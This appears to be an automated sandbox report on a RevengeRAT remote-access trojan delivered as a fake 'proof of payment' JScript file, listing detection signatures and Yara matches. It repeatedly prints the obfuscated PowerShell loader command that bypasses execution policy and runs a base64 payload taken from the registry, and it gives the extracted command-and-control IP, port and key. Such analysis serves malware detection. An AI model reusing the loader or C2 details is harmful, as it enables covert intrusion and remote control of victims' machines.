
Windows Analysis Report
comprovante de pagamento.js

Overview

General Information

Sample name: comprovante de pagamento.js
Analysis ID: 1578395
MD5: 0c3e47c0fb0d5a289fded25fd9746817
SHA1: 2117b82b1724a2f146ffd015b50ce45c63d7fb87
SHA256: 2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d
Tags: js, RevengeRAT, user-abuse_ch

Detection

RevengeRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected RevengeRAT
Bypasses PowerShell execution policy
Found RAT behaviour (information extraction to be send to C&C)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6756 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"Host": ["38.51.135.44"], "Port": ["333"], "ID": "NyanCatRevenge", "Mutex": "9822cb7521c94057", "Key": "Revenge-RAT", "Splitter": "!@#%^NYAN#!@$"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security | -

Source | Rule | Description | Author | Strings
00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security | -
00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp | Windows_Trojan_Revengerat_db91bcc6 | unknown | unknown
  • 0x2e27:$a1: Revenge-RAT
  • 0x2b5a:$a2: SELECT * FROM FirewallProduct
  • 0x2d55:$a3: HKEY_CURRENT_USER\SOFTWARE\
  • 0x246f:$a4: get_MachineName
00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_RevengeRAT | RevengeRAT and variants payload | ditekSHen
  • 0x1e45:$l1: Lime.Connection
  • 0x1ec2:$l2: Lime.Packets
  • 0x1ed6:$l3: Lime.Settings
  • 0x1ea1:$l4: Lime.NativeMethods
  • 0x1fec:$s1: GetAV
  • 0x2ad6:$s2: keepAlivePing!
  • 0x2e27:$s3: Revenge-RAT
  • 0x22eb:$s6: set_SendBufferSize
  • 0x2b1c:$q1: Select * from AntiVirusProduct
  • 0x2b5a:$q2: SELECT * FROM FirewallProduct
  • 0x2bdc:$q3: select * from Win32_Processor
00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security | -
00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Revengerat_db91bcc6 | unknown | unknown
  • 0xb97b7:$a1: Revenge-RAT
  • 0x19ebfc:$a1: Revenge-RAT
  • 0xb94ea:$a2: SELECT * FROM FirewallProduct
  • 0x1d82e4:$a2: SELECT * FROM FirewallProduct
  • 0xb96e5:$a3: HKEY_CURRENT_USER\SOFTWARE\
  • 0xb8dff:$a4: get_MachineName
(5 further entries not expanded on the page)

Source | Rule | Description | Author | Strings
1.2.powershell.exe.1768164d990.1.unpack | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security | -
1.2.powershell.exe.176f6380000.2.raw.unpack | JoeSecurity_RevengeRAT | Yara detected RevengeRAT | Joe Security | -
1.2.powershell.exe.1768164d990.1.unpack | Windows_Trojan_Revengerat_db91bcc6 | unknown | unknown
  • 0x1027:$a1: Revenge-RAT
  • 0xd5a:$a2: SELECT * FROM FirewallProduct
  • 0xf55:$a3: HKEY_CURRENT_USER\SOFTWARE\
  • 0x66f:$a4: get_MachineName
1.2.powershell.exe.176f6380000.2.raw.unpack | Windows_Trojan_Revengerat_db91bcc6 | unknown | unknown
  • 0x2e27:$a1: Revenge-RAT
  • 0x2b5a:$a2: SELECT * FROM FirewallProduct
  • 0x2d55:$a3: HKEY_CURRENT_USER\SOFTWARE\
  • 0x246f:$a4: get_MachineName
1.2.powershell.exe.1768164d990.1.unpack | MALWARE_Win_RevengeRAT | RevengeRAT and variants payload | ditekSHen
  • 0xcd6:$s2: keepAlivePing!
  • 0x1027:$s3: Revenge-RAT
  • 0x4eb:$s6: set_SendBufferSize
  • 0xd1c:$q1: Select * from AntiVirusProduct
  • 0xd5a:$q2: SELECT * FROM FirewallProduct
  • 0xddc:$q3: select * from Win32_Processor
(13 further entries not expanded on the page)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", ProcessId: 6996, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", ProcessId: 6996, ProcessName: powershell.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ProcessId: 6756, ProcessName: wscript.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", ProcessId: 6996, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ProcessId: 6756, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);", ProcessId: 6996, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-19T16:42:37.253666+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 38.51.135.44 | 333 | TCP
2024-12-19T16:43:07.252902+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 38.51.135.44 | 333 | TCP
2024-12-19T16:43:37.257973+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 38.51.135.44 | 333 | TCP
2024-12-19T16:43:51.502758+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 38.51.135.44 | 333 | TCP
2024-12-19T16:43:55.674603+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 38.51.135.44 | 333 | TCP
2024-12-19T16:43:55.862048+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 38.51.135.44 | 333 | TCP
2024-12-19T16:44:11.610122+0100 | 2035885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 38.51.135.44 | 333 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-19T16:42:07.244342+0100 | 2841113 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 38.51.135.44 | 333 | TCP

AV Detection

Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp; Malware Configuration Extractor: RevengeRAT {"Host": ["38.51.135.44"], "Port": ["333"], "ID": "NyanCatRevenge", "Mutex": "9822cb7521c94057", "Key": "Revenge-RAT", "Splitter": "!@#%^NYAN#!@$"}
Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic; Suricata IDS: 2841113 - Severity 1 - ETPRO MALWARE MSIL/Revenge-RAT CnC Checkin M4 : 192.168.2.4:49730 -> 38.51.135.44:333
Source: Network traffic; Suricata IDS: 2035885 - Severity 1 - ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 : 192.168.2.4:49730 -> 38.51.135.44:333
Source: global traffic; TCP traffic: 192.168.2.4:49730 -> 38.51.135.44:333
Source: Joe Sandbox View; ASN Name: COGENT-174US
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: unknown; TCP traffic detected without corresponding DNS query: 38.51.135.44
Source: powershell.exe, 00000001.00000002.2974720720.000001769008B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2959069281.0000017680001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2959069281.0000017680001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2974720720.000001769008B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe

E-Banking Fraud

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR

System Summary

Source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
Source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE; Matched rule: RevengeRAT and variants payload Author: ditekSHen
Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE; Matched rule: RevengeRAT and variants payload Author: ditekSHen
Source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
Source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE; Matched rule: RevengeRAT and variants payload Author: ditekSHen
Source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
Source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE; Matched rule: RevengeRAT and variants payload Author: ditekSHen
Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE; Matched rule: RevengeRAT and variants payload Author: ditekSHen
Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE; Matched rule: RevengeRAT and variants payload Author: ditekSHen
Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: RevengeRAT and variants payload Author: ditekSHen
Source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
Source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8C4001
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8C4DB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8B8D18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8C7B58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8D5F50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8BF67D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8EC518
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8C752D
Source: comprovante de pagamento.js; Initial sample: Strings found which are bigger than 50
Source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
Source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
